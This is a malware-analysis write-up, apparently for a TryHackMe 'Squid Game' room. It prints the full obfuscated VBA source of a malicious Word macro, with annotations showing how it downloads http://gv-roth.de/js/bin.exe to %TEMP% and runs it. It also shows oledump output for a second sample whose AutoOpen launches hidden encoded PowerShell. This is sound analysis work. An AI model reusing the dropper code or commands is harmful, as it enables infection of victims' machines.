Dim FNOMR As String
Dim wDhutJNQ As Long
' Walk the input two hex digits at a time.
For wDhutJNQ = 1 To Len(LIfBaRNaq) Step 2
If 128918 = 128918 + 1 Then End
If 3786 < 26 Then
If 751819 = 751819 + 1 Then End
If 3264 < 68 Then
MsgBox ("uQQmbkpk91")
End If
If Len("gCUNhpmZ4478") = Len("AfkPTCKQ") Then
MsgBox ("Error !!!")
End If
MsgBox ("HplLmocL88")
End If
If Len("gnJhlPff4992") = Len("izYUCJCG") Then
If 453232 = 453232 + 1 Then End
If 2346 < 12 Then
MsgBox ("tZGiCmps23")
End If
If Len("prksphdB3552") = Len("eRyRFxWn") Then
MsgBox ("Error !!!")
End If
MsgBox ("Error !!!")
End If
If 513385 = 513385 + 1 Then End
If 1788 < 34 Then
MsgBox ("MdLJUEle65")
End If
If Len("zvFxcxRf2893") = Len("gGbyDpzx") Then
MsgBox ("Error !!!")
End If
' The only real work: Chr$(38) & Chr$(72) is "&H", so Val("&Hxx") parses the pair as hex
' and Chr$ turns the byte value into a one-character string.
bOYvqTVCQck = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(LIfBaRNaq, wDhutJNQ, 2)))
If 679582 = 679582 + 1 Then End
If 4764 < 49 Then
If 988195 = 988195 + 1 Then End
If 5892 < 13 Then
MsgBox ("PLjzMDno76")
End If
If Len("opFcKgjZ3694") = Len("zQEGxwNt") Then
MsgBox ("Error !!!")
End If
MsgBox ("CLZiRzih72")
End If
If Len("ttcDmMln2566") = Len("kwoxPUHO") Then
If 768811 = 768811 + 1 Then End
If 3344 < 68 Then
MsgBox ("LlhuNOmN91")
End If
If Len("aTqSHATq1946") = Len("AjrSPany") Then
MsgBox ("Error !!!")
End If
MsgBox ("Error !!!")
End If
If 312727 = 312727 + 1 Then End
If 7138 < 44 Then
MsgBox ("fwJBAgAh17")
End If
If Len("vkytXtMV8243") = Len("kLWxnsEn") Then
MsgBox ("Error !!!")
End If
' Accumulate the decoded byte.
FNOMR = FNOMR & bOYvqTVCQck
Next wDhutJNQ
If 729678 = 729678 + 1 Then End
If 3216 < 86 Then
If 794514 = 794514 + 1 Then End
If 3692 < 52 Then
MsgBox ("rtzipwlx84")
End If
If Len("sjCDNfRU3716") = Len("vUIxhzzH") Then
MsgBox ("Error !!!")
End If
MsgBox ("bocnPvMm58")
End If
If Len("CbWCINQG1818") = Len("JaPgdumj") Then
If 749461 = 749461 + 1 Then End
If 6217 < 59 Then
MsgBox ("clnhRiWt51")
End If
If Len("ZWzmHeVK6323") = Len("wxJSwpUl") Then
MsgBox ("Error !!!")
End If
MsgBox ("Error !!!")
End If
If 175442 = 175442 + 1 Then End
If 6491 < 99 Then
MsgBox ("cLrzZuDD22")
End If
If Len("TtBUlBVV7515") = Len("JwOkIDwu") Then
MsgBox ("Error !!!")
End If
Hextostring = FNOMR
End Function
' Auto_Open: Excel's legacy auto-macro name. Each GoTo targets the label on the very next
' line, so the three jumps are no-op control-flow noise; the only effect is the call to
' IOWZJGNTSGK, the real entry point.
Sub Auto_Open()
GoTo hpolxosipwleovqydqiijfmpmhadwhkijvlbokhmrnhlwrcbihvyiwnplgjfltwjtypwmbprbpunfrtvrl:
hpolxosipwleovqydqiijfmpmhadwhkijvlbokhmrnhlwrcbihvyiwnplgjfltwjtypwmbprbpunfrtvrl:
GoTo bfvcjnnjkjkvxctrntfoimlrjeyrtcbdbkdaxpratpwmmiosffuwjoxzowxecewxwdoypivotfbjbuxmul:
bfvcjnnjkjkvxctrntfoimlrjeyrtcbdbkdaxpratpwmmiosffuwjoxzowxecewxwdoypivotfbjbuxmul:
GoTo rkckdqbljfjtdbrryuwatebpsacldejdsschjsuavrcbpilzgevpmjxvcmfuzhozfprtuwyfedvshsetyf:
rkckdqbljfjtdbrryuwatebpsacldejdsschjsuavrcbpilzgevpmjxvcmfuzhozfprtuwyfedvshsetyf:
IOWZJGNTSGK
End Sub
' AutoOpen: the Word auto-macro that fires when the document is opened (this sample is a
' .doc, so this is the trigger that matters). Same no-op GoTo padding; it just funnels
' into Auto_Open.
Sub AutoOpen()
GoTo zgjksfckvjbfupbfpqerjkfbyvhphicghmdzwyshljawbwgybalblihqmatttqiaxprnmitiumgzjglrmt:
zgjksfckvjbfupbfpqerjkfbyvhphicghmdzwyshljawbwgybalblihqmatttqiaxprnmitiumgzjglrmt:
GoTo ntkwgbazodnxlmngkssfvjdwvczwjxotblvzzropmwqzxlujflzjpazteectmrbvtqnnnqobmcyydrssnb:
ntkwgbazodnxlmngkssfvjdwvczwjxotblvzzropmwqzxlujflzjpazteectmrbvtqnnnqobmcyydrssnb:
GoTo ocgfmhrsimdpiyclijxwpjopjtlwjtopoyithnuojbvcaauwaavscrmxsabgqvemffbcddzhhdsvmnjfcp:
ocgfmhrsimdpiyclijxwpjopjtlwjtopoyithnuojbvcaauwaavscrmxsabgqvemffbcddzhhdsvmnjfcp:
Auto_Open
End Sub
' Workbook_Open: Excel's workbook-open event handler name, presumably included so the same
' payload fires if the module is dropped into an Excel host (in this Word document it is
' not auto-triggered — confirm). Same no-op GoTo padding; funnels into Auto_Open.
Sub Workbook_Open()
GoTo fqugoppeeftaopjzsjmupsrtovfxedfgpecorppweusztfkzphwpfhofwhixfaghbmfkdwnsycrsvjrtly:
fqugoppeeftaopjzsjmupsrtovfxedfgpecorppweusztfkzphwpfhofwhixfaghbmfkdwnsycrsvjrtly:
GoTo heqkginwiaibyfsvwvqtxuitugennjoangyodyfcqziwybtnwvwtibwqomzimszrrprdgguukjywhbuygx:
heqkginwiaibyfsvwvqtxuitugennjoangyodyfcqziwybtnwvwtibwqomzimszrrprdgguukjywhbuygx:
GoTo psjngffkwvmdllnhrcbfqiugmqunvyccxewbrxqhmlfswjoulnrvcmkxsetiqqriaihnzvtulingjhehnf:
psjngffkwvmdllnhrcbfqiugmqunvyccxewbrxqhmlfswjoulnrvcmkxsetiqqriaihnzvtulingjhehnf:
Auto_Open
End Sub
' ZUWSBYDOTWV(url, path): downloads url with MSXML2.XMLHTTP, writes the raw response body to
' path with plain VBA file I/O, then launches %TEMP%\DYIATHUQLCW.exe through Shell.Application.
' Declared As Boolean but never assigns a return value (callers always get False). There is no
' On Error in this function, so a failed request or write raises. Every GoTo jumps to the
' label on the following line — no-op padding. LSFYHUDVCYR is declared but never used, and
' hBBkbmop6VHJL is never declared (implicit Variant; no Option Explicit in the dump).
Function ZUWSBYDOTWV(ByVal FYAMZFQXNVI As String, ByVal CVUDEDVJFST As String) As Boolean
Dim VPBCRFOQENN As Object, LSFYHUDVCYR As Long, QSBXXUZTKRD As Long, MDLLXOKIXRV() As Byte
GoTo hjwiwiyeojxvawsanclcahyfrfgwjdikfsfnjazxovvouiysjoieyyyjvczcudqpbumdziyyzydjhmvmdd:
hjwiwiyeojxvawsanclcahyfrfgwjdikfsfnjazxovvouiysjoieyyyjvczcudqpbumdziyyzydjhmvmdd:
GoTo xwqdjsttofxtkraaybygbodqkprjcpmjlvvdoqvxaokuluhzjnnpkgyqmwfmtvooihxsiqkaoyssrerysn:
xwqdjsttofxtkraaybygbodqkprjcpmjlvvdoqvxaokuluhzjnnpkgyqmwfmtvooihxsiqkaoyssrerysn:
GoTo brfgzmzrcabwgbcfbtnfmhjqhazwlbtduyyfkhjhmcvjlqrnnuntxcjijgjcqvhnjmfvpgmywngwcdiybg:
brfgzmzrcabwgbcfbtnfmhjqhazwlbtduyyfkhjhmcvjlqrnnuntxcjijgjcqvhnjmfvpgmywngwcdiybg:
' XORI(hex-decoded data, hex-decoded key) = "MSXML2.XMLHTTP" (3F^72='M', 34^67='S', 19^41='X', ...).
Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
GoTo fpvygztoabfyscyqmjxaakqwiwqpjfzgwplzmhryvptavvsitizcoqgammdhoraqpviudbameizhxxkfiw:
fpvygztoabfyscyqmjxaakqwiwqpjfzgwplzmhryvptavvsitizcoqgammdhoraqpviudbameizhxxkfiw:
GoTo fjuvxpaemzuawljcczrjcqncfqtadadckbfxynawdigwsmxxfdtoiyzyriibnsacdbvkbubskrjrvkujkg:
fjuvxpaemzuawljcczrjcqncfqtadadckbfxynawdigwsmxxfdtoiyzyriibnsacdbvkbubskrjrvkujkg:
GoTo atdgxcypqufobazqwfbzsdpphuexwbgmzrvveuqfuissqnqrjbvmoathximeitkzlsazxqlwrbwkegkczc:
atdgxcypqufobazqwfbzsdpphuexwbgmzrvveuqfuissqnqrjbvmoathximeitkzlsazxqlwrbwkegkczc:
' Decodes to "GET"; third argument False makes the request synchronous, so responseBody
' is complete once Send returns.
VPBCRFOQENN.Open XORI(Hextostring("00353B"), Hextostring("47706F634E")), FYAMZFQXNVI, False
GoTo epeseeevnrzyaadmzsevtcsqluqvolrmjnixrzskpndwmoroasnxrummjcspjhcnelodnfpcezpisjevfv:
epeseeevnrzyaadmzsevtcsqluqvolrmjnixrzskpndwmoroasnxrummjcspjhcnelodnfpcezpisjevfv:
GoTo maokmvxjtqtpftqzvdrnngwsapudlcejlbqkuatexahbsfmqoicfoaivfabrltukeprqqvrfpvrejlgeqv:
maokmvxjtqtpftqzvdrnngwsapudlcejlbqkuatexahbsfmqoicfoaivfabrltukeprqqvrfpvrejlgeqv:
GoTo sjxdhcerkhefckeipoiiuyqtxyvinbyqezfovvlmrerfrqsyaywnotmvfernkainkhxraujtcwwztuqtrk:
sjxdhcerkhefckeipoiiuyqtxyvinbyqezfovvlmrerfrqsyaywnotmvfernkainkhxraujtcwwztuqtrk:
' Send body: appears to decode to a meaningless 6-character string ("gVHBnk" — verify), not a
' header name; a body is ignored for a GET anyway.
VPBCRFOQENN.Send XORI(Hextostring("2B0F25162232"), Hextostring("4C596D54"))
GoTo gvmsrorblqfnrjolulwwxmxgvzmrtfbbfaljljudjhbbxnovjreufhyrdxpzrsvoxlooybzlkvwnadubpr:
gvmsrorblqfnrjolulwwxmxgvzmrtfbbfaljljudjhbbxnovjreufhyrdxpzrsvoxlooybzlkvwnadubpr:
GoTo vkgymmqtvhsqigckerbehvgndmtviptwxefqeovgkmdywdtsxwgeztwteajsmnvgovickubtbjojchvavr:
vkgymmqtvhsqigckerbehvgndmtviptwxefqeovgkmdywdtsxwgeztwteajsmnvgovickubtbjojchvavr:
GoTo eefacwluvdsabkxksygzskpgnyxphqvqmjvybamguztrddgzxprzrdeiyiuhbpgfwrexfqimxjosfotycl:
eefacwluvdsabkxksygzskpgnyxphqvqmjvybamguztrddgzxprzrdeiyiuhbpgfwrexfqimxjosfotycl:
' Raw response bytes; no status-code check before they are written to disk.
MDLLXOKIXRV = VPBCRFOQENN.responseBody
GoTo oyvsqgqcyuwgtctubxrljpltcezjxtssqvblihttgpkbfekrxowacmwewceoaqxhdlotlqoquuaksqlcth:
oyvsqgqcyuwgtctubxrljpltcezjxtssqvblihttgpkbfekrxowacmwewceoaqxhdlotlqoquuaksqlcth:
GoTo dzhmmxhnfrasicvjjpseprigmeolanldvlihpwgoksljzgwoycrcitvhcaybislwhylvedsxyelioervvj:
dzhmmxhnfrasicvjjpseprigmeolanldvlihpwgoksljzgwoycrcitvhcaybislwhylvedsxyelioervvj:
GoTo isegyhulplxjpkfaqzstfxaboybyprklnkwzxoixqdexvibqjqqfvntdpjwopldzhmffbvvdvydebthefj:
isegyhulplxjpkfaqzstfxaboybyprklnkwzxoixqdexvibqjqqfvntdpjwopldzhmffbvvdvydebthefj:
' File drop uses native VBA binary I/O (Open/Put/Close), not ADODB.Stream.
QSBXXUZTKRD = FreeFile
Open CVUDEDVJFST For Binary As #QSBXXUZTKRD
Put #QSBXXUZTKRD, , MDLLXOKIXRV
Close #QSBXXUZTKRD
GoTo vdpicaomrghrizweyaaozmrwyiyrubxpytxwqedttfneypyxmwzolrkvrghzhcpvdovereglnjrdohqryu:
vdpicaomrghrizweyaaozmrwyiyrubxpytxwqedttfneypyxmwzolrkvrghzhcpvdovereglnjrdohqryu:
GoTo ngtplnbnislqtghybuwictiwrbvoddltxhtemlrbrltdyrcmoszexgadznluscjfpehkuhcvoouwavrtwv:
ngtplnbnislqtghybuwictiwrbvoddltxhtemlrbrltdyrcmoszexgadznluscjfpehkuhcvoouwavrtwv:
GoTo gwjszpofcnutwsbxmljtbuzrblemslyuiwjsilpkqhgvdmwohdyzopbtepgmqesyglpmmnbkpqghntgsfd:
gwjszpofcnutwsbxmljtbuzrblemslyuiwjsilpkqhgvdmwohdyzopbtepgmqesyglpmmnbkpqghntgsfd:
GoTo byxsxnpghvnbvkrgcuhsgztkersubfntrrmtrcjdbemqbhuvetdyllrakpcaukdktlpyupnzytvynwldzz:
byxsxnpghvnbvkrgcuhsgztkersubfntrrmtrcjdbemqbhuvetdyllrakpcaukdktlpyupnzytvynwldzz:
GoTo cckqxskeypruwnmoemiyeejgtzmqhaaonszuqrucwwvahggyylevwcjiupfyjzqhzrvsrrqfpbsqtkaohq:
cckqxskeypruwnmoemiyeejgtzmqhaaonszuqrucwwvahggyylevwcjiupfyjzqhzrvsrrqfpbsqtkaohq:
GoTo rwxumqulzygtqkrwzfbqwfewutedetjeriydgckahepjhxcpztzzrnpepyfrngvfbxztxgufoefihmlxut:
rwxumqulzygtqkrwzfbqwfewutedetjeriydgckahepjhxcpztzzrnpepyfrngvfbxztxgufoefihmlxut:
' Decodes to "Shell.Application" (02^51='S', 0A^62='h', 27^42='e', 1C^70='l', ...).
Set hBBkbmop6VHJL = CreateObject(XORI(Hextostring("020A271C3D4C0300210E2B1330162B1F3F"), Hextostring("51624270")))
GoTo zlbrmdtmprviueydvnhzltntlvfofmkntrjatbzfuxavnqxeasqawcqlnddunpozvflosmyvmvfrlwvkcw:
zlbrmdtmprviueydvnhzltntlvfofmkntrjatbzfuxavnqxeasqawcqlnddunpozvflosmyvmvfrlwvkcw:
GoTo cymkgaghrqzskhomptqembbmdowhzswsilmqxztokhksqucilnmcqlplntosnjpwpiizppkjdeaxupsqbc:
cymkgaghrqzskhomptqembbmdowhzswsilmqxztokhksqucilnmcqlplntosnjpwpiizppkjdeaxupsqbc:
GoTo sbawlclojhxparpakhmfucvtwinbxhjqqozqdofgmqiejtkkykqfzphrenmsqwmjekdxoeetrjwuemxnbh:
sbawlclojhxparpakhmfucvtwinbxhjqqozqdofgmqiejtkkykqfzphrenmsqwmjekdxoeetrjwuemxnbh:
' Shell.Application.Open(Environ("TEMP") & "\DYIATHUQLCW.exe") executes the dropped file.
' Note the launch path is rebuilt here instead of reusing the CVUDEDVJFST parameter; the
' caller happens to pass the same value, but the two are not tied together.
hBBkbmop6VHJL.Open Environ(XORI(Hextostring("3C3F3A03"), Hextostring("687A7753"))) & XORI(Hextostring("1217092B0F0718371F1F133560362807"), Hextostring("4E535062"))
GoTo zhbgddcmjsnilsugiepwecwcxltbxbjufbtgufsdjvftrhkrentmbfezatdpzztqsssichtcptvblraaxs:
zhbgddcmjsnilsugiepwecwcxltbxbjufbtgufsdjvftrhkrentmbfezatdpzztqsssichtcptvblraaxs:
GoTo iipgxjxthbjxifqrzxbojqmgpfqahonaeikufzxmtdozgioggaekervfdgvbuzkoumgelbasjdvpcmzutc:
iipgxjxthbjxifqrzxbojqmgpfqahonaeikufzxmtdozgioggaekervfdgvbuzkoumgelbasjdvpcmzutc:
GoTo zygtufihxcugogvxuetvxslpzbpcunbycgmjdickpmuxxndqhwvswlbiulydkhltbnyncpizuqgsjmcidn:
zygtufihxcugogvxuetvxslpzbpcunbycgmjdickpmuxxndqhwvswlbiulydkhltbnyncpizuqgsjmcidn:
End Function
' IOWZJGNTSGK: real entry point reached from Auto_Open. Builds the download URL and the drop
' path, then hands both to ZUWSBYDOTWV (download -> write -> execute). GoTo padding as elsewhere.
Sub IOWZJGNTSGK()
' Decodes to "http://gv-roth.de/js/bin.exe" (1C^74='h', 3B^4F='t', 24^50='t', 04^74='p', 75^4F=':', ...).
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))
GoTo vswgmmnoquqmdzdukyxjdchijuhbcdgxsbrnikwqdcfhiwhzbjaoqluoidzajkwvumggfhftcrnozygzlx:
vswgmmnoquqmdzdukyxjdchijuhbcdgxsbrnikwqdcfhiwhzbjaoqluoidzajkwvumggfhftcrnozygzlx:
GoTo eqowyelsbrffhhlqqucltfylnpeftufafvjrzyvtgvjpzvpeyxbayzjytlyclyghuqmwumbcduprmiblyx:
eqowyelsbrffhhlqqucltfylnpeftufafvjrzyvtgvjpzvpeyxbayzjytlyclyghuqmwumbcduprmiblyx:
GoTo ruzhzqmkplaybaejhgnsgttcpypofokfkpmcawosbktnfsxibprcykuytpgkldhvrbktjpihhfuxhbdqoh:
ruzhzqmkplaybaejhgnsgttcpypofokfkpmcawosbktnfsxibprcykuytpgkldhvrbktjpihhfuxhbdqoh:
' Second argument decodes to Environ("TEMP") & "\DYIATHUQLCW.exe" — the local name of the payload.
ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
End Sub
' XORI(data, key): repeating-key XOR over the characters of data. The key index is 1-based:
' i Mod Len(key), with Len(key) substituted when the remainder is 0 — the same cyclic
' behaviour as CyberChef's default XOR, which is why the hex key can be pasted there as-is.
' Both arguments are already hex-decoded by Hextostring at every call site.
' The If/MsgBox blocks are dead (always-false tests, 12 = 8 length compares), but the three
' Do While/DoEvents loops that sit OUTSIDE those blocks do run: 73 iterations on entry and
' 91 more per input character. That is deliberate stalling, not junk — budget for it when
' emulating.
Public Function XORI(ByVal pThgwA As String, ByVal uTjbLtvPsxK As String) As String
Dim qDrdEbaBjAmrQrC As Long
If 197974 = 197974 + 1 Then End
If 5669 < 12 Then
Dim rrsqtvVn As Integer
rrsqtvVn = 1
Do While rrsqtvVn < 83
DoEvents: rrsqtvVn = rrsqtvVn + 1
Loop
MsgBox ("vBNHchZL92")
End If
If Len("GoACvBKz6529") = Len("jDtqUckI") Then
Dim ZsaeMBSl As Integer
ZsaeMBSl = 6
Do While ZsaeMBSl < 96
DoEvents: ZsaeMBSl = ZsaeMBSl + 1
Loop
MsgBox ("Error !!!")
End If
' This loop is not guarded by a dead condition — it executes (4..76 = 73 DoEvents calls).
Dim llWAooaJ As Integer
llWAooaJ = 4
Do While llWAooaJ < 77
DoEvents: llWAooaJ = llWAooaJ + 1
Loop
For qDrdEbaBjAmrQrC = 1 To Len(pThgwA)
If 953497 = 953497 + 1 Then End
If 6383 < 67 Then
Dim tMzCjwqZ As Integer
tMzCjwqZ = 2
Do While tMzCjwqZ < 53
DoEvents: tMzCjwqZ = tMzCjwqZ + 1
Loop
MsgBox ("IlZTqywD49")
End If
If Len("CLQsIKEv7233") = Len("JspJACJS") Then
Dim HUocoJtv As Integer
HUocoJtv = 8
Do While HUocoJtv < 68
DoEvents: HUocoJtv = HUocoJtv + 1
Loop
MsgBox ("Error !!!")
End If
' Also unguarded — runs once per character (3..93 = 91 DoEvents calls).
Dim qqtGMmtg As Integer
qqtGMmtg = 3
Do While qqtGMmtg < 94
DoEvents: qqtGMmtg = qqtGMmtg + 1
Loop
' key[((i-1) mod Len(key)) + 1] XOR data[i], appended one character at a time.
XORI = XORI & Chr(Asc(Mid(uTjbLtvPsxK, IIf(qDrdEbaBjAmrQrC Mod Len(uTjbLtvPsxK) <> 0, qDrdEbaBjAmrQrC Mod Len(uTjbLtvPsxK), Len(uTjbLtvPsxK)), 1)) Xor Asc(Mid(pThgwA, qDrdEbaBjAmrQrC, 1)))
Next qDrdEbaBjAmrQrC
End Function
----------------------------------------------------------------------------
./oledump.py attacker4.doc -v -s 7 | grep "Set"
Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
Set hBBkbmop6VHJL = CreateObject(XORI(Hextostring("020A271C3D4C0300210E2B1330162B1F3F"), Hextostring("51624270")))
De-obfuscating the VBA Macro
After identifying that stream 7 (`Macros/VBA/ThisDocument`, flagged `M`) contained a VBA macro, I extracted the source code with `oledump.py attacker4.doc -v -s 7`. The code hides every COM ProgID, HTTP verb, environment-variable name, path and URL behind two helpers: `Hextostring` turns a hex string into raw bytes, and `XORI` XORs those bytes against a key that is itself hex-decoded, cycling the key with a 1-based `Mod` index.
3.1 Analyzing the XOR Logic
The following line was found in the initial macro dump:
VBA
Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
This indicates that the attacker is creating a COM object whose ProgID is recovered by XORing a hex-encoded ciphertext with a hex-encoded key. Both arguments pass through `Hextostring` before `XORI` sees them, so CyberChef must be fed the raw hex of the key (Key Format: Hex), not the ASCII text of the VBA literal.
3.2 Decryption with CyberChef
To reveal the hidden object, I used CyberChef with the following recipe:
Input: 3F34193F254049193F253A331522
From Hex: Converts the input into raw bytes.
XOR: * Key: 7267417269
Key Format: Hex
Result: MSXML2.XMLHTTP (not WinHttp.WinHttpRequest.5.1 — the ciphertext is only 14 bytes, and the first pairs give 3F^72 = `M`, 34^67 = `S`, 19^41 = `X`, …; this is the MSXML HTTP client and matches row 1 of the table below).
Step-by-Step Decoding Table
Walking the macro from top to bottom, the XOR-decoded strings appear in this order:
| Order | Decoded Result | Purpose in the Attack | Question Answer |
|---|---|---|---|
| 1 | MSXML2.XMLHTTP | Tool to talk to the internet | |
| 2 | GET | Instruction to download | |
| 3 | (short junk string) | Body passed to `.Send` — appears to decode to the meaningless 6-character value `gVHBnk` rather than a header name, and is ignored for a GET | |
| 4 | Shell.Application | COM object whose `.Open` launches the dropped file; the file itself is written with VBA `Open … For Binary`/`Put`, not ADODB.Stream | |
| 5 | TEMP | The folder location | Q3: TEMP |
| 6 | \DYIATHUQLCW.exe | The name of the first file | Q2: DYIATHUQLCW.exe |
| 7 | bin.exe | Filename part of the download URL — the remote name of the same payload, not a second dropped file | Q4: bin.exe |
| 8 | gv-roth.de/js/bin.exe | The download source | Q5: gv-roth.de/js/bin.exe |
Q2 & Q4: The Binaries (.exe files)
In malware analysis, a "binary" usually refers to an executable file (ending in .exe). The two names here are two views of one file, not a loader and a second stage: `bin.exe` is the name of the payload on the server (`http://gv-roth.de/js/bin.exe`), and `DYIATHUQLCW.exe` is the name it is saved under in `%TEMP%` before `Shell.Application.Open` runs it. Nothing in this macro downloads a second file.
Q3: The Folder (TEMP)
Malware commonly drops files into the `%TEMP%` directory because every Windows user can write there without Administrator rights. In this macro `Environ` is called with the XOR-decoded string `TEMP` immediately before the decoded filename, in both the drop path and the launch path.
Q5: The URI (gv-roth.de/js/bin.exe)
A URI (Uniform Resource Identifier) is the address of the file on the internet. In the decoded output, one of the strings was a web address. Per the instructions, we remove the http:// prefix to get the clean URI.
attacker - 05
└─$ ./oledump.py attacker5.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7157 '1Table'
5: 97 'Macros/CatchMeIfYouCan/\x01CompObj'
6: 313 'Macros/CatchMeIfYouCan/\x03VBFrame'
7: 7566 'Macros/CatchMeIfYouCan/f'
8: 84 'Macros/CatchMeIfYouCan/o'
9: 557 'Macros/PROJECT'
10: 113 'Macros/PROJECTwm'
11: M 1473 'Macros/VBA/CatchMeIfYouCan'
12: M 994 'Macros/VBA/Module1'
13: m 924 'Macros/VBA/ThisDocument'
14: 3394 'Macros/VBA/_VBA_PROJECT'
15: 889 'Macros/VBA/dir'
16: 4096 'WordDocument'
└─$ ./oledump.py attacker5.doc -s a -S
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Title
sales
Normal
salesdepartmentx@outlook.com
Microsoft Office Word
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
sQ}#
theme/theme/theme1.xml
"GJK
TcKBc
v[`E
'.Lq
yDQ"Q
Z6/H
ud9c
J{rJ
Q/B)L
lC=h
W!alf
AXl:X
PxzSq]y<u
n6 m
;B=s!
q5;3
BU`M
b!e9#i
`571
W 0xn?G
theme/theme/_rels/themeManager.xml.rels
6?$Q
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal
Default Paragraph Font
Table Normal
No List
Project.Module1.AutoOpen
PROJECT.MODULE1.AUTOOPEN
Unknown
Times New Roman
Symbol
Arial
Calibri
Calibri Light
Cambria Math
sales
salesdepartmentx@outlook.com
Microsoft Forms 2.0 Form
Embedded Object
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} CatchMeIfYouCan
Caption = "CobaltStrikeIsEverywhere"
ClientHeight = 3015
ClientLeft = 120
ClientTop = 465
ClientWidth = 4560
StartUpPosition = 1 'CenterOwner
TypeInfoVer = 2
SquidGame
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
CheckBox1
Tahoma
ID="{A8A99B21-86A6-4F44-904F-5A4A5CE1B784}"
Document=ThisDocument/&H00000000
Module=Module1
Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}
BaseClass=CatchMeIfYouCan
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="C5C7209B60D664D664D664D664"
DPB="FCFE19D4670A680A680A"
GC="3331D6210C220C22F3"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=409, 261, 2252, 695,
Module1=137, 219, 1587, 738,
CatchMeIfYouCan=130, 130, 1973, 564, , 52, 52, 1502, 571,
ThisDocument
Module1
CatchMeIfYouCan
tThisDocument
1Module1
nCatchMeIfYouCan
ey_q
Attribut
e VB_Nam
e = "Cat
chMeIfYo
uCan"
0{1E
FEF94B-5
D68-499E
-896C-2E
F23F0DFA
0F}{91AF
CBA1-38E
A-4EEC-A
A4D-8812
BB58}
d@Global
oFals
Creata
PredeHcla
BExpos
0Templ
ateDeriv
Customi
b SquidG
_Click(
0{1EFEF94B-5D68-499E-896C-2EF23F0DFA0F}{91AFCBA1-38EA-4EEC-AA4D-8812B8EABB58}
powershell -nop -w hidden -encodedcommand
Attribut
e VB_Nam
e = "Mod
ule1"
ub AutoO
pen()
Shell "@powers
nop -w h
idden -e
ncodedco
mmand "
& CatchM
eIfYouCa
n.SquidG
.Contro
lTipText
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Spac
Crea
tabl
Pre decla
BExp
Temp
lateDeri
$Custom
(1Normal.ThisDocument
Word
Win16
Win32
Win64x
VBA6
VBA7
Project-
stdole
Normal
Office
MSFormsC
ThisDocument<
_Evaluate
Module1b
AutoOpen
ShellV
CatchMeIfYouCanB
SquidGame
ControlTipText8
SquidGame_Click
CatchMeIfYouCan_Click]r
UserFormN
Documentj
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files (x86)\Microsoft Office\root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{D267CABC-6B5E-4542-8C9F-D12A8339F5C3}#2.0#0#C:\Users\TESTUS~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
ThisDocument
016378006d
ThisDocument
Module1
026378006d
Module1
CatchMeIfYouCan
036378006d
CatchMeIfYouCan
Project
rstd
ole>
\G{00020
430-
0046}#
2.0#0#C:
\Windows
\SysWOW6
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2
DF8D04C-
5BFA-101@B-BDE5
gAjA
ram File
s (x86)\@Common
Microsof
t Shared
\OFFICE1
6\MSO.DL
P 16.
0 Ob
Li`brary
zMSF@Cs>
452EE1-E
1A-8
-02608C4 D0BB4
eFMl20L'B
00}#0
D267CA
BC-6B5E-
4542-8C9
F-D12A83@39F5C3H.U
sers\TES
TUS~1\Ap
pData\Lo
cal\Temp0\VBE
ZB/.e<xd
[U4@"
ThisDoc
umentG
Dodul
Catc
hMeIfYou
CanG
CE@ut@mh
_*qc#(h
bjbjb3b3
P-M|
└─$ ./oledump.py attacker5.doc -s a -S | grep -i caption
Caption = "CobaltStrikeIsEverywhere"
[https://www.papermtn.co.uk/tryhackme-squid-game-attacker-5/]